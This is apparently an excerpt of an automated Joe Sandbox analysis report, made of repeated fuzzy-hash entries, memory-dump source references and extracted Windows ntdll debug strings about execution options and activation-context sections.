                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
                                                                                                  • Instruction ID: e5702af5ad867fc1ac36bf95fed7b2eee5e1dcfbbc2962c83c17eca39a85bc70
                                                                                                  • Opcode Fuzzy Hash: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
                                                                                                  • Instruction Fuzzy Hash: FDF0BEB3611304AFE314CF21CD05B86B7E9EFA8764F2884789945D72E0FAB1DE00CA14
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 69ba2b007462f16b2c50d8529a9cc708750a1aa7975619c61a89b374bbc48803
                                                                                                  • Instruction ID: a25501c318a0c8546802c7d6d1aa9d43c9a6bcbbf9b88598f74169617bfd045e
                                                                                                  • Opcode Fuzzy Hash: 69ba2b007462f16b2c50d8529a9cc708750a1aa7975619c61a89b374bbc48803
                                                                                                  • Instruction Fuzzy Hash: 3DF09675A11348EFDB04DFA8D816E9EBBF4BF48304F404459B501EB381EA74DA00CB94
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c04cd6c6ae426fc3fae155dfaf96a12a04f6d01d1fd0b34fa55f33bf435d3c94
                                                                                                  • Instruction ID: dc2531ef3a81a1cf2f4e89710a18447de858d11f4c3c207a79ebeb2b44d95036
                                                                                                  • Opcode Fuzzy Hash: c04cd6c6ae426fc3fae155dfaf96a12a04f6d01d1fd0b34fa55f33bf435d3c94
                                                                                                  • Instruction Fuzzy Hash: F3F052B980DFA0BFE711C368E100B4177F89BC37B4F488866CA288B711CF66D880C650
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fda03f31852ef77867c5a61c750e844b41ac752b596576d3c8e544a1d5e9496a
                                                                                                  • Instruction ID: fc8a29a47e83e58b2eb577e5b1ea667f21fc366a7458c4758f410e66a14f3459
                                                                                                  • Opcode Fuzzy Hash: fda03f31852ef77867c5a61c750e844b41ac752b596576d3c8e544a1d5e9496a
                                                                                                  • Instruction Fuzzy Hash: 7AF08275A11248ABDB05DBA8C866B9E7BB8AF48704F500498F601EB280D974DA41C758
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 89daeed9e9b5f481b62a659dc28d5d4c24e43b7c8d794b7f2671f971a8f12411
                                                                                                  • Instruction ID: 47193455f147bedc4b9d068bef241642da6e4aaa595f6cb3cf6061496c1e9ab8
                                                                                                  • Opcode Fuzzy Hash: 89daeed9e9b5f481b62a659dc28d5d4c24e43b7c8d794b7f2671f971a8f12411
                                                                                                  • Instruction Fuzzy Hash: D3F08270A11248ABDB04DFB8D556F9E77B8AF48704F504498B601FB280EA74DA00C754
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 69d636f4afce377a28d5cfd3899c7895100a78ca4f721bd8bc654198bad7ef25
                                                                                                  • Instruction ID: 421790abb9eb3b4675f76a4840ee41c1257a4eae765cad10676af4571658d25c
                                                                                                  • Opcode Fuzzy Hash: 69d636f4afce377a28d5cfd3899c7895100a78ca4f721bd8bc654198bad7ef25
                                                                                                  • Instruction Fuzzy Hash: 15F0E235A217A09FEB20CB29D144B117FD4AB40BBAF0D9060D81887901C760DAC0C690
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 01f80ea36dce55f220d470440e58e0686a4a798accb4b22392d32b5a54c2908c
                                                                                                  • Instruction ID: c91adfad87192c40e337ac9f84cd3072bfa2b9e0c4e72dbdefad5ccbbfbe15f3
                                                                                                  • Opcode Fuzzy Hash: 01f80ea36dce55f220d470440e58e0686a4a798accb4b22392d32b5a54c2908c
                                                                                                  • Instruction Fuzzy Hash: 89F0A775A11248EFDB05CBB8C956F9EB7F8AF48704F800498F601EB2C0DAB4DA40C758
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  • Opcode ID: 36b74b1b8e2f47d771c98b7cf5ce4e1f1b4bafba42c827d97e8f72395fd6b697
                                                                                                  • Instruction ID: 44a97fb8ad0ec37ad91b1c464d69d59f1a5e51c006ee0b7469d72eec959c67b8
                                                                                                  • Opcode Fuzzy Hash: 36b74b1b8e2f47d771c98b7cf5ce4e1f1b4bafba42c827d97e8f72395fd6b697
                                                                                                  • Instruction Fuzzy Hash: DD900235221000020545B9585B1854B448557D6361391C81AF1406550CCA31896D6321
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1c5fa59846770c1d84f7d2afa846ec94c9fc1b6d46a512ea59d3baa9183389ef
                                                                                                  • Instruction ID: 54bd6d6ca630f55a9b595ca6d4c0eef9189bc702928a46988b06acf8d6576081
                                                                                                  • Opcode Fuzzy Hash: 1c5fa59846770c1d84f7d2afa846ec94c9fc1b6d46a512ea59d3baa9183389ef
                                                                                                  • Instruction Fuzzy Hash: 9590023160500802D55075589A28786404547D0311F51C816A0014614DCB658B5D76A1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 40318fcf2f846d9bb1afe3d30d1e5defe1fb144cab66c23a49f8b32e261092db
                                                                                                  • Instruction ID: c00b4697aa53fa5ec20c8a38df9854fe41c76338219ee264140f8c0d00edd140
                                                                                                  • Opcode Fuzzy Hash: 40318fcf2f846d9bb1afe3d30d1e5defe1fb144cab66c23a49f8b32e261092db
                                                                                                  • Instruction Fuzzy Hash: 0490027120200003450575589A28656804A47E0211B51C826E1004550DC93589997125
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5ca9d87c112b52fea2a324367345a2faa938ae48774a3920962001e05f72be96
                                                                                                  • Instruction ID: e32a6f98f8149bd5fe1fc5704d27cfdbfaa2f87acbcb06dfbdf1702c371b28ec
                                                                                                  • Opcode Fuzzy Hash: 5ca9d87c112b52fea2a324367345a2faa938ae48774a3920962001e05f72be96
                                                                                                  • Instruction Fuzzy Hash: 3990023120100802D50475589E186C6404547D0311F51C816A6014615EDA7589997131
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8f67015587138de9158cd396e950dbfbdc144241dfe1ae76a55116856f87bd69
                                                                                                  • Instruction ID: 1931bbd3db59b17605f8c5a19716cde39ae1ffb596d888ca9dd1ff4f695fc83c
                                                                                                  • Opcode Fuzzy Hash: 8f67015587138de9158cd396e950dbfbdc144241dfe1ae76a55116856f87bd69
                                                                                                  • Instruction Fuzzy Hash: BD90023120100802D58075589A1868A404547D1311F91C81AA0015614DCE258B5D77A1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e2233dae2678ebb4a3a57c5d02043f3062ccf3a960d5653981a84ebf07fcfd28
                                                                                                  • Instruction ID: 5286ee14929e914a130951de54a662e9b4fa2962e0818e1601c6e29aa973b561
                                                                                                  • Opcode Fuzzy Hash: e2233dae2678ebb4a3a57c5d02043f3062ccf3a960d5653981a84ebf07fcfd28
                                                                                                  • Instruction Fuzzy Hash: 1D90023120504842D54075589A18A86405547D0315F51C816A0054654DDA358E5DB661
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 08dd9d28b008a6efb8ce1c37545c596dbc4b31b130a98e56f7a24caf1158d353
                                                                                                  • Instruction ID: 1732c3304fe8deb9094fa30f068a96065ca623db660871ed22b9c5ed72f1b369
                                                                                                  • Opcode Fuzzy Hash: 08dd9d28b008a6efb8ce1c37545c596dbc4b31b130a98e56f7a24caf1158d353
                                                                                                  • Instruction Fuzzy Hash: 5D90023120100402D5007998AA1C686404547E0311F51D816A5014515ECA7589997131
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 40f916908b80540afc44b5760eadb40d8eba9fcc6c2b15e8e241d7bfe29193bd
                                                                                                  • Instruction ID: b64a1abb0eebd8e580836bbdc956757ea31585dc02b8e13f3aa97a25c6ace197
                                                                                                  • Opcode Fuzzy Hash: 40f916908b80540afc44b5760eadb40d8eba9fcc6c2b15e8e241d7bfe29193bd
                                                                                                  • Instruction Fuzzy Hash: AC90023160500402D5407558AA2C746405547D0211F51D816A0014514DCA698B5D76A1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2189a69856592333cba00cc9067bc240dfe62f2ef57fa6680b748881d5652991
                                                                                                  • Instruction ID: eab8dc38c081f09ef84e2eeb654fd467be41936f1efc212c9fc32785b68fcd47
                                                                                                  • Opcode Fuzzy Hash: 2189a69856592333cba00cc9067bc240dfe62f2ef57fa6680b748881d5652991
                                                                                                  • Instruction Fuzzy Hash: 3B90023120100842D50075589A18B86404547E0311F51C81BA0114614DCA25C9597521
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 648f7f67bbb01478dc66c83f615b8aa43b213f864da559add2a81f06833c3ebe
                                                                                                  • Instruction ID: 8489e3e41af63548647ccc63605549b6692a629851cb5d03aa8e87372bbe7f6d
                                                                                                  • Opcode Fuzzy Hash: 648f7f67bbb01478dc66c83f615b8aa43b213f864da559add2a81f06833c3ebe
                                                                                                  • Instruction Fuzzy Hash: 7790023124505102D550755C9A18656804567E0211F51C826A0804554DC965895D7221
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 182410364e9b6877ec352244f30bb3b53ab4744fe43d227c3538d6ac4b8e37d2
                                                                                                  • Instruction ID: f5fc28e3e0668c4a2bcccb2f7c3a8c075df21478be84b4d1679dd808b3395b8f
                                                                                                  • Opcode Fuzzy Hash: 182410364e9b6877ec352244f30bb3b53ab4744fe43d227c3538d6ac4b8e37d2
                                                                                                  • Instruction Fuzzy Hash: 539002B1201140924900B658DA18B4A854547E0211B51C81BE1044520CC9358959A135
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2fb970bce38a828b88319c72bb7421bc740a2188f91ec2c6ada75f8be3127ba6
                                                                                                  • Instruction ID: 1092bf1c8cb175332e989c3ca99f361f21b2d842aeeaf6df99f9fb0ded46f13f
                                                                                                  • Opcode Fuzzy Hash: 2fb970bce38a828b88319c72bb7421bc740a2188f91ec2c6ada75f8be3127ba6
                                                                                                  • Instruction Fuzzy Hash: 33900235211000030505B9585B18547408647D5361351C826F1005510CDA3189696121
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1861f52b24d98b821ce57b2a3841139458e597a74687b807cd8c81a36c2e46f8
                                                                                                  • Instruction ID: de6b225a30058bb79a6a8869389c767616d329ba436a9032c20bc8442509e0e3
                                                                                                  • Opcode Fuzzy Hash: 1861f52b24d98b821ce57b2a3841139458e597a74687b807cd8c81a36c2e46f8
                                                                                                  • Instruction Fuzzy Hash: 6E90027134100442D50075589A28B46404587E1311F51C81AE1054514DCA29CD5A7126
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 36a24ad3102bd88babe9f4821ea8b737908374b3db49879c960daac87ae43c53
                                                                                                  • Instruction ID: 32dea80a955e82cea94993d07759d0648ac1f25a6e76364ce9201d64b313c332
                                                                                                  • Opcode Fuzzy Hash: 36a24ad3102bd88babe9f4821ea8b737908374b3db49879c960daac87ae43c53
                                                                                                  • Instruction Fuzzy Hash: 3090027120140403D54079589E18647404547D0312F51C816A2054515ECE398D597135
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: HEAP:
                                                                                                  • API String ID: 3446177414-2466845122
                                                                                                  • Opcode ID: 3a9e14552e9dfd6fc7b023914511e990a72cd19ae2bd4e201d41634065911764
                                                                                                  • Instruction ID: eb0d1eb3b4c4bfd75f5f6614d17fcb71a4ec47a67997f0afa2033f6f1700636b
                                                                                                  • Opcode Fuzzy Hash: 3a9e14552e9dfd6fc7b023914511e990a72cd19ae2bd4e201d41634065911764
                                                                                                  • Instruction Fuzzy Hash: B2A1CCB5A143218FD708CE68C894A1ABBE5FF88754F14492DEA45DB310FB70EE46CB91

                                                                                                  Strings
                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 32564530
                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3256454D
                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 32564507
                                                                                                  • ExecuteOptions, xrefs: 325644AB
                                                                                                  • Execute=1, xrefs: 3256451E
                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 32564592
                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 32564460
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                  • API String ID: 0-484625025
                                                                                                  • Opcode ID: b4c5958c2c8110e5bc159c3faa3c9a10f786cb161bb7a5418b47e935492f79e8
                                                                                                  • Instruction ID: 63a64e770c8f33b57eb9110fad05c24fcc9e80b19df92ece558da638732b81a3
                                                                                                  • Opcode Fuzzy Hash: b4c5958c2c8110e5bc159c3faa3c9a10f786cb161bb7a5418b47e935492f79e8
                                                                                                  • Instruction Fuzzy Hash: EE51F471A01319AFEB14DAA4DC95FA977B8EF48349F4004E9EA05A71C1EB70AF45CE60

                                                                                                  Strings
                                                                                                  • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 325578F3
                                                                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32557807
                                                                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 325577E2
                                                                                                  • SsHd, xrefs: 3250A304
                                                                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 325577DD, 32557802
                                                                                                  • Actx , xrefs: 32557819, 32557880
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                  • API String ID: 0-1988757188
                                                                                                  • Opcode ID: 45bee5e28cb7242f79f95e359e1e25f41e90fb55bd2d2f270c61db45a0ad0e31
                                                                                                  • Instruction ID: d069fc8e7744f452963c756c6d469a1c51203b10729537be40567320cba064d0
                                                                                                  • Opcode Fuzzy Hash: 45bee5e28cb7242f79f95e359e1e25f41e90fb55bd2d2f270c61db45a0ad0e31
                                                                                                  • Instruction Fuzzy Hash: 32E1D5746043428FE715CE24CC9075A7BE1BF85368F508A2EEE65CB290DB35DA49CF81
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32559178
                                                                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32559153
                                                                                                  • GsHd, xrefs: 3250D794
                                                                                                  • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 32559372
                                                                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 3255914E, 32559173
                                                                                                  • Actx , xrefs: 32559315
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
